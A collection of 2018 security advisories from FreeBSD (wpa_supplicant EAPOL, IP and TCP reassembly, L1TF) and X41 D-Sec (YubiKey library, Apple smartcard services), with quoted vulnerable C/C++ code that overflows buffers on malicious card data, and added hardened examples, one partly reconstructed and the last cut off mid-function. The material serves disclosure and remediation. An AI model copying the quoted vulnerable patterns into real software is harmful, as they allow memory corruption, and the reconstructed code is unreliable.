computers as well as embedded systems.  Supplicant is the IEEE 802.1X/WPA
component that is used in the client stations.  It implements key negotiation
with a WPA Authenticator and it controls the roaming and IEEE 802.11
authentication/association of the wlan(4) driver.

The wpa_supplicant(8) utility is designed to be a "daemon" program that runs
in the background and acts as the backend component controlling the wireless
connection.  The wpa_supplicant(8) utility supports separate frontend programs
and a text-based frontend (wpa_cli(8)) and a GUI (wpa_gui) are included with
wpa_supplicant(8).

II.  Problem Description

When using WPA2, for EAPOL-Key frames with the Encrypted flag set and the MIC
flag not set, the data field was decrypted without first verifying the MIC.
When the data field was encrypted using RC4, for example when negotiating TKIP
as the pairwise cipher, the unauthenticated but decrypted data was subsequently
processed.  This opened wpa_supplicant(8) to abuse by decryption and recovery
of sensitive information contained in EAPOL-Key messages.

See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt
for a detailed description of the bug.
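Added example, not hostap code: the EAPOL-Key acceptance rule the fix enforces, in C, applied to a constructed frame body. A frame carrying the Encrypted Key Data flag without the MIC flag is dropped before any decryption is attempted; the Key Information bit values and the 95-byte fixed body layout are those of IEEE 802.11, and mic_ok stands in for the caller's MIC verification.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Key Information bits of the IEEE 802.11 EAPOL-Key frame. */
#define WPA_KEY_INFO_KEY_TYPE      0x0008   /* 1 = pairwise key */
#define WPA_KEY_INFO_MIC           0x0100
#define WPA_KEY_INFO_ENCR_KEY_DATA 0x1000

/* Fixed part of the EAPOL-Key body: type(1) key_info(2) key_length(2)
 * replay_counter(8) nonce(32) iv(16) rsc(8) id(8) mic(16) key_data_len(2). */
#define EAPOL_KEY_FIXED_LEN 95
#define EAPOL_KEY_INFO_OFF  1

enum eapol_verdict {
    EAPOL_ACCEPT = 0,
    EAPOL_DROP_ENCR_WITHOUT_MIC = 1,   /* the check the fix adds */
    EAPOL_DROP_BAD_MIC = 2,
    EAPOL_DROP_TRUNCATED = 3
};

/* The gate the fix enforces.  mic_ok is the outcome of the caller's MIC
 * verification (modelled as an int).  Nothing in the Key Data field is
 * decrypted unless this returns EAPOL_ACCEPT. */
static enum eapol_verdict eapol_key_gate(uint16_t key_info, int mic_ok)
{
    int has_mic   = (key_info & WPA_KEY_INFO_MIC) != 0;
    int encrypted = (key_info & WPA_KEY_INFO_ENCR_KEY_DATA) != 0;

    if (encrypted && !has_mic)
        return EAPOL_DROP_ENCR_WITHOUT_MIC;   /* previously decrypted anyway */
    if (has_mic && !mic_ok)
        return EAPOL_DROP_BAD_MIC;
    return EAPOL_ACCEPT;
}

/* Parse Key Information (big-endian) out of a raw EAPOL-Key body and gate it. */
static enum eapol_verdict eapol_key_gate_body(const uint8_t *body, size_t len, int mic_ok)
{
    if (len < EAPOL_KEY_FIXED_LEN)
        return EAPOL_DROP_TRUNCATED;
    uint16_t key_info = (uint16_t)((body[EAPOL_KEY_INFO_OFF] << 8) |
                                   body[EAPOL_KEY_INFO_OFF + 1]);
    return eapol_key_gate(key_info, mic_ok);
}

/* Constructed frame body with the given Key Information and all other
 * fields zeroed; out must hold EAPOL_KEY_FIXED_LEN bytes. */
static void make_eapol_key_body(uint16_t key_info, uint8_t *out)
{
    memset(out, 0, EAPOL_KEY_FIXED_LEN);
    out[0] = 2;                                   /* descriptor type: RSN */
    out[EAPOL_KEY_INFO_OFF] = (uint8_t)(key_info >> 8);
    out[EAPOL_KEY_INFO_OFF + 1] = (uint8_t)(key_info & 0xff);
}

/* Build a frame with key_info and return the gate's verdict on it. */
static int gate_constructed(uint16_t key_info, int mic_ok)
{
    uint8_t body[EAPOL_KEY_FIXED_LEN];
    make_eapol_key_body(key_info, body);
    return (int)eapol_key_gate_body(body, sizeof body, mic_ok);
}
```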

III. Impact

All users of the WPA2 TKIP pairwise cipher are vulnerable to disclosure of
information, for example the group key.

IV.  Workaround

Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in
wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pairwise=CCMP'.

This can also be mitigated by removing TKIP as a cipher on the AP.

Systems and users who do not use WPA2 TKIP are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc
# gpg --verify hostapd.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc
# gpg --verify hostapd-10.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r337832
releng/10.4/                                                      r337829
stable/11/                                                        r337831
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
- -------------------------------------------------------------------------

FreeBSD Security Advisory FreeBSD-SA-18:10.ip

2018-08-14 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:10.ip Security Advisory
  The FreeBSD Project

Topic:  Resource exhaustion in IP fragment reassembly

Category:   core
Module: inet
Announced:  2018-08-14
Credits:    Juha-Matti Tilli from Aalto University, Department of
            Communications and Networking, and Nokia Bell Labs
Affects:    All supported versions of FreeBSD.
Corrected:  2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE)
            2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
            2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:   CVE-2018-6923

Special note:   Due to source code differences in FreeBSD 10-stable a patch
                is not yet available for FreeBSD 10.4.  This will follow at
                a later date.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of
packets which are too big to traverse all the links between two end
stations. Any router along the path between two end hosts may fragment
packets which are larger than a link's maximum transmission unit
(MTU). FreeBSD's implementation of some IPv4 protocols (such as the
Transmission Control Protocol [TCP]) perform path MTU discovery to
avoid the need for fragmentation.

IP version 6 (IPv6) retains the concept of packet fragmentation. It
changed the fragmentation operation to require that the originating
end-system perform path MTU discovery and fragment packets which are
too large for any MTU along the path between two end systems.

While all hosts attached to the Internet are required to support
fragmentation and reassembly, many hosts will encounter very few
legitimate fragmented packets due to the operation of path MTU discovery.

II.  Problem Description

A researcher has notified us of a DoS attack applicable to another
operating system. While FreeBSD may not be vulnerable to that exact
attack, we have identified several places where inadequate DoS protection
could allow an attacker to consume system resources.

It is not necessary that the attacker be able to establish two-way
communication to carry out these attacks. These attacks impact both
IPv4 and IPv6 fragment reassembly.

III. Impact

In the worst case, an attacker could send a stream of crafted
fragments with a low packet rate which would consume a substantial
amount of CPU.

Other attack vectors allow an attacker to send a stream of crafted
fragments which could consume a large amount of CPU or all available
mbuf clusters on the system.

These attacks could temporarily render a system unreachable through
network interfaces or temporarily render a system unresponsive. The
effects of the attack should clear within 60 seconds after the attack stops.

IV.  Workaround

Disable fragment reassembly, using these commands:
 % sysctl net.inet.ip.maxfragpackets=0
 % sysctl net.inet6.ip6.maxfrags=0

On systems compiled with VIMAGE, these sysctls will need to be
executed for each VNET.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release or
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc
# gpg --verify ip.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -

FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf

2018-08-14 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:09.l1tf   Security Advisory
  The FreeBSD Project

Topic:  L1 Terminal Fault (L1TF) Kernel Information Disclosure

Category:   core
Module: Kernel
Announced:  2018-08-14
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE)
            2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
            2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:   CVE-2018-3620, CVE-2018-3646

Special Note:   Speculative execution vulnerability mitigation remains a work
                in progress.  This advisory addresses the issue in FreeBSD
                11.1 and later.  We expect to update this advisory to include
                10.4 at a later time.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

When a program accesses data in memory via a logical address it is translated
to a physical address in RAM by the CPU.  Accessing an unmapped logical
address results in what is known as a terminal fault.

II.  Problem Description

On certain Intel 64-bit x86 systems there is a period of time during terminal
fault handling where the CPU may use speculative execution to try to load
data.  The CPU may speculatively access the level 1 data cache (L1D).  Data
which would otherwise be protected may then be determined by using side
channel methods.

This issue affects bhyve on FreeBSD/amd64 systems.

III. Impact

An attacker executing user code, or kernel code inside of a virtual machine,
may be able to read secret data from the kernel or from another virtual
machine.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc
# gpg --verify l1tf-11.2.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc
# gpg --verify l1tf-11.1.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2018-3620 (L1 Terminal Fault-OS)
- 
FreeBSD reserves the the memory page at physical address 0, so it will not
contain secret data.  FreeBSD zeros the paging data structures for unmapped
addresses, so that speculatively executed L1 Terminal Faults will access only
the reserved, unused page.

CVE-2018-3646 (L1 Terminal Fault-VMM)
- -
Patched systems flush the L1 data cache prior to guest entry, so that there
is no secret data in cache for a terminal fault (from the the guest) to
access.

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r337794
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

More information on L1 Terminal Fault is available at:

https://cve.mitre.o

FreeBSD Security Advisory FreeBSD-SA-18:08.tcp

2018-08-14 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:08.tcpSecurity Advisory
  The FreeBSD Project

Topic:  Resource exhaustion in TCP reassembly 

Category:   core
Module: inet
Announced:  2018-08-06
Credits:    Juha-Matti Tilli from Aalto University, Department of
            Communications and Networking, and Nokia Bell Labs
Affects:    All supported versions of FreeBSD.
Corrected:  2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
            2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
            2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
            2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
            2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:   CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.


0.   Revision history

v1.0   2018-08-06  Initial release.
v1.1   2018-08-14  Fixed documentation date in manual pages.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service.

To transmit a stream of data, TCP breaks the data stream into segments
for transmission through the Internet, and reassembles the segments at
the receiving side to recreate the data stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly
handling, with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems
to only accept TCP connections from trusted end-stations, if it is
possible to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue. The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size
of each TCP connection's reassembly queue. The value is controlled by
a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum
number of TCP segments that can be outstanding on a session's
reassembly queue. This value defaults to 100.

Note that setting this value too low could impact the throughput of
TCP connections which experience significant loss or
reordering. However, the higher this number is set, the more resources
can be consumed on TCP reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

[*** v1.1 NOTE ***] The following patch sets are provided for completeness;
they have little impact on runtime behavior.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc
# gpg --verify tcp-man-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc
# gpg --verify tcp-man-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reb

X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr

2018-08-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-004

Multiple Vulnerabilities in Yubico libykneomgr
==


Overview
- 
Confirmed Affected Versions: 0.1.9
Confirmed Patched Versions: -
Vendor: Yubico / Deprecated
Vendor URL: https://www.yubico.com/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/


Summary and Impact
- --
An out of bounds write and read was discovered when malicious
responses from a smartcard are received. These might lead to memory
corruptions. We assume that these are not easily exploitable.
X41 did not perform a full test or audit on the software.
Please note that the library has been deprecated for more than a year and no
update will be published by the vendor.


Product Description
- ---
This is a C library to interact with the CCID-part of the YubiKey NEO.
There is a command line tool "ykneomgr" for interactive use.  It
supports querying the YubiKey NEO for firmware version, operation mode
(OTP/CCID) and serial number.  You may also mode switch the device and
manage applets (list, delete and install).

Out of Bounds Read/Writes
=
Severity Rating: Medium
Vector: APDU Response
CVE:
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
File lib/backend_pcsc.c contains the following code in function
`backend_applet_list()`

{% highlight c %}
  {
    size_t i;
    size_t thislen = recv[length++];
    for (i = 0; i < thislen; i++)
      {
        if (appletstr)
          {
            if (reallen + 2 > *len)
              {
                return YKNEOMGR_BACKEND_ERROR;
              }
            /* sprintf() writes two hex digits plus a terminating NUL, i.e.
               three bytes, while the check above only reserved two */
            sprintf (p, "%02x", recv[length]);
            p += 2;
          }
        reallen += 2;
        length++;
      }
    if (appletstr)
      {
        if (reallen + 1 > *len)
          {
            return YKNEOMGR_BACKEND_ERROR;
          }
        *p = '\0';
        p++;
      }
    reallen++;
    length += 2;
  }
{% endhighlight %}

There is an off-by-one write of a '\x00' when sprintf() is called, since it
terminates the string with a trailing null byte. Additionally, reads are
performed based on thislen, which is retrieved from the card's response data
without further safety checks.


Workarounds
- ---
It is advised to migrate to YubiKey Manager since the vendor does not
support the library anymore and will not issue a patch.

Timeline

2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug, but states that library is
deprecated, will not be fixed
2018-08-11 Advisory released
- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier


X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices

2018-08-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-005

Multiple Vulnerabilities in Apple smartcardservices
===


Overview
- 
Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f
Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de
Vendor: Apple
Vendor URL: https://smartcardservices.github.io/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/


Summary and Impact
- --
Attackers with local access can exploit security issues in the
smartcard driver. These result in memory corruptions, which might lead
to code execution. Since smartcards can be used for authentication,
the vulnerabilities may allow an attacker to login to the system
without valid credentials as any user.
X41 did not perform a full test or audit on the software.


Product Description
- ---
The Smart Card Services project is comprised of several components
which, when combined, provide the necessary abstraction layer and
integration of smart cards into Apple’s CDSA implementation.

Stack based buffer overflow
===
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4300
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
In file Tokend/CAC/CACRecord.cpp the function
CACCertificateRecord::getDataAttribute() might overwrite the value
certificate and possibly other stack data, if a smartcard provides
malicious data.

{% highlight c++ %}
unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 };
unsigned char result[MAX_BUFFER_SIZE];
size_t resultLength = sizeof(result);
uint8 certificate[CAC_MAXSIZE_CERT];
uint8 uncompressed[CAC_MAXSIZE_CERT];
size_t certificateLength = 0;
try
{
    PCSC::Transaction _(cacToken);
    cacToken.select(mApplication);
    uint32_t cacreturn;
    do
    {
        cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result,
                                          resultLength);
        if ((cacreturn & 0xFF00) != 0x6300)
            CACError::check(cacreturn);
        size_t requested = command[4];
        if (resultLength != requested + 2)
            PCSC::Error::throwMe(SCARD_E_PROTO_MISMATCH);
        // certificateLength is never compared with sizeof(certificate)
        memcpy(certificate + certificateLength, result, resultLength - 2);
        certificateLength += resultLength - 2;
        // Number of bytes to fetch next time around is in the last byte
        // returned.
        command[4] = cacreturn & 0xFF;
    } while ((cacreturn & 0xFF00) == 0x6300);
}
catch (...)
{
    return NULL;
}
{% endhighlight %}

As long as the smartcard returns a return code of 0x63FF, more data is
copied into the certificate buffer, causing a stack based overflow. A
malicious smartcard is able to control all of the overflowed bytes.
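The chunked read above copies each response into certificate[] without ever comparing certificateLength with the buffer's capacity. The following C example, added here and not taken from the smartcardservices project, shows the same loop with the missing capacity check and a constructed card model (fake_card_t, fake_exchange() and CERT_CAPACITY are assumptions of the example): an honest card that reports the next chunk size in the status word is read to the end, while a card that keeps answering 0x63FF is rejected as soon as the next chunk would not fit.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Destination capacity: a constructed stand-in for CAC_MAXSIZE_CERT. */
#define CERT_CAPACITY 1024

/* Constructed card model. An honest card holds `total` bytes and announces
 * the next chunk size in the status word (0x63NN = NN more bytes follow,
 * 0x9000 = done); a malicious card answers 0x63FF forever. */
typedef struct {
    size_t total;
    size_t offset;
    int    malicious;
} fake_card_t;

/* Stand-in for exchangeAPDU(): writes `want` payload bytes plus SW1 SW2
 * into `out`, stores the total in *out_len and returns the status word. */
static uint32_t fake_exchange(fake_card_t *c, uint8_t want,
                              uint8_t *out, size_t *out_len)
{
    uint32_t sw;
    memset(out, 0x41, want);                 /* constructed payload bytes */
    c->offset += want;
    if (c->malicious) {
        sw = 0x63FF;
    } else if (c->offset >= c->total) {
        sw = 0x9000;
    } else {
        size_t rem = c->total - c->offset;
        sw = 0x6300 | (uint32_t)(rem > 0xFF ? 0xFF : rem);
    }
    out[want]     = (uint8_t)(sw >> 8);
    out[want + 1] = (uint8_t)(sw & 0xFF);
    *out_len = (size_t)want + 2;
    return sw;
}

/* The advisory's loop with the missing bound: every chunk is checked
 * against the remaining capacity of `cert` before memcpy(). Returns the
 * certificate length, or -1 on a protocol mismatch or when the card offers
 * more data than the buffer can hold. */
static long fetch_certificate(fake_card_t *c, uint8_t *cert, size_t cert_cap)
{
    uint8_t result[255 + 2];
    uint8_t want = 0x64;                     /* first request: 100 bytes, as command[4] */
    size_t cert_len = 0;

    for (;;) {
        size_t result_len = 0;
        uint32_t sw = fake_exchange(c, want, result, &result_len);
        if ((sw & 0xFF00) != 0x6300 && sw != 0x9000)
            return -1;                       /* CACError::check() would throw here */
        if (result_len != (size_t)want + 2)
            return -1;                       /* SCARD_E_PROTO_MISMATCH in the original */
        size_t data_len = result_len - 2;
        if (data_len > cert_cap - cert_len)
            return -1;                       /* the missing check: reject, do not overflow */
        memcpy(cert + cert_len, result, data_len);
        cert_len += data_len;
        if ((sw & 0xFF00) != 0x6300)
            break;
        want = (uint8_t)(sw & 0xFF);         /* next chunk size, chosen by the card */
        if (want == 0)
            return -1;                       /* a zero-length "more data" chunk would loop forever */
    }
    return (long)cert_len;
}

/* Demonstrations: a 250-byte certificate from an honest card, and a card
 * that never stops signalling "more data". */
static long demo_honest_card(void)
{
    fake_card_t c = { 250, 0, 0 };
    uint8_t cert[CERT_CAPACITY];
    return fetch_certificate(&c, cert, sizeof cert);      /* 250 */
}

static long demo_malicious_card(void)
{
    fake_card_t c = { 0, 0, 1 };
    uint8_t cert[CERT_CAPACITY];
    return fetch_certificate(&c, cert, sizeof cert);      /* -1 */
}
```

The capacity check is placed before the memcpy() rather than after the loop because the card, not the host, decides how many chunks follow; checking afterwards would already be too late.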


Workarounds
- ---
None

Stack based buffer overflow with limited input
==
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4301
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function
GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value
strData if the supplied dataLength is too big.

{% highlight c++ %}
void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken &gemaltoToken,
        CK_ULONG mech, const AccessCredentials *cred, unsigned char *data,
        size_t dataLength, unsigned char *output, size_t &outputLength)
{
    GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt\n");
    GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - mechanism <%lu>\n", mech);
    GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - cred <%p>\n", cred);
    char strData[6000];
    memset(strData, '\0', sizeof(strData));
    char *str = strData;
    // The loop body was lost in extraction (everything between the first '<'
    // and the next '>' was dropped); it is reconstructed here from the
    // advisory's description and the exact format string is assumed: every
    // input byte is hex-formatted into the fixed 6000-byte strData with no
    // check of dataLength against sizeof(strData).
    for (size_t i = 0; i < dataLength; i++)
        str += sprintf(str, "%02x", data[i]);
    GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - dataLength <%lu> - data <%s>\n", dataLength, strData);
    GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - output <%p>\n", output);
    GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - outputLength <%lu>\n", outputLength);
{% endhighlight %}

The attacker might control the data which is to be decrypted, but
exploitation is limited by the sprintf() format string.
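Both the libykneomgr loop in X41-2018-004 above and computeDecrypt() here format card-supplied bytes as hex into a fixed buffer with sprintf(), which writes a terminating NUL that neither bounds check accounts for. The following C example, added here and not code from either project, shows the bounded form of both: hex_encode() refuses input that would not fit including the NUL, and applet_list_to_str() checks the card-supplied entry length against the received data on the read side and against the remaining output capacity on the write side. The entry layout, the function names and the GET STATUS style sample response are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hex-encodes `n` bytes into `dst` (capacity `cap`, NUL included).
 * Returns the number of characters written, or -1 when 2*n+1 bytes do not
 * fit. This is the bounded form of the loop computeDecrypt() runs into a
 * fixed 6000-byte buffer. */
static long hex_encode(const uint8_t *src, size_t n, char *dst, size_t cap)
{
    if (n > (SIZE_MAX - 1) / 2 || 2 * n + 1 > cap)
        return -1;
    for (size_t i = 0; i < n; i++)
        snprintf(dst + 2 * i, 3, "%02x", src[i]);   /* 2 hex chars + NUL, inside cap */
    return (long)(2 * n);
}

/* Hardened form of the libykneomgr loop. `recv` holds entries of the form
 * [len][len AID bytes][2 attribute bytes] (the original skips two bytes per
 * entry with length += 2). Each AID is written to `out` as a NUL-terminated
 * hex string. Returns the bytes used in `out`, or -1 when the card-supplied
 * length overruns the received data or the output capacity. */
static long applet_list_to_str(const uint8_t *recv, size_t recv_len,
                               char *out, size_t out_cap)
{
    size_t in = 0, used = 0;
    while (in < recv_len) {
        size_t this_len = recv[in++];
        /* read side: the AID plus two trailing bytes must lie inside recv */
        if (this_len + 2 > recv_len - in)
            return -1;
        /* write side: 2*this_len hex chars plus the entry's NUL; the NUL that
         * sprintf() writes after each pair lands inside this region */
        if (2 * this_len + 1 > out_cap - used)
            return -1;
        for (size_t i = 0; i < this_len; i++)
            sprintf(out + used + 2 * i, "%02x", recv[in + i]);
        used += 2 * this_len;
        out[used++] = '\0';
        in += this_len + 2;
    }
    return (long)used;
}

/* Constructed response with two applets: A0 00 and D2 76 00. */
static const uint8_t demo_recv[] = {
    0x02, 0xA0, 0x00,       0x07, 0x00,
    0x03, 0xD2, 0x76, 0x00, 0x07, 0x00 };

/* Returns 1 when both entries were encoded and separated as expected. */
static int demo_applets_ok(void)
{
    char out[64];
    long used = applet_list_to_str(demo_recv, sizeof demo_recv, out, sizeof out);
    return used == 12 && strcmp(out, "a000") == 0 && strcmp(out + 5, "d27600") == 0;
}

/* Same response, with a caller-chosen output capacity. */
static long demo_applets_capacity(size_t cap)
{
    char out[64];
    return applet_list_to_str(demo_recv, sizeof demo_recv, out,
                              cap > sizeof out ? sizeof out : cap);
}

/* Constructed malformed response: claims 5 AID bytes but carries 1. */
static long demo_truncated_input(void)
{
    const uint8_t bad[] = { 0x05, 0x01 };
    char out[32];
    return applet_list_to_str(bad, sizeof bad, out, sizeof out);
}

static long demo_hex(size_t cap)
{
    const uint8_t bytes[] = { 0xDE, 0xAD };
    char out[16];
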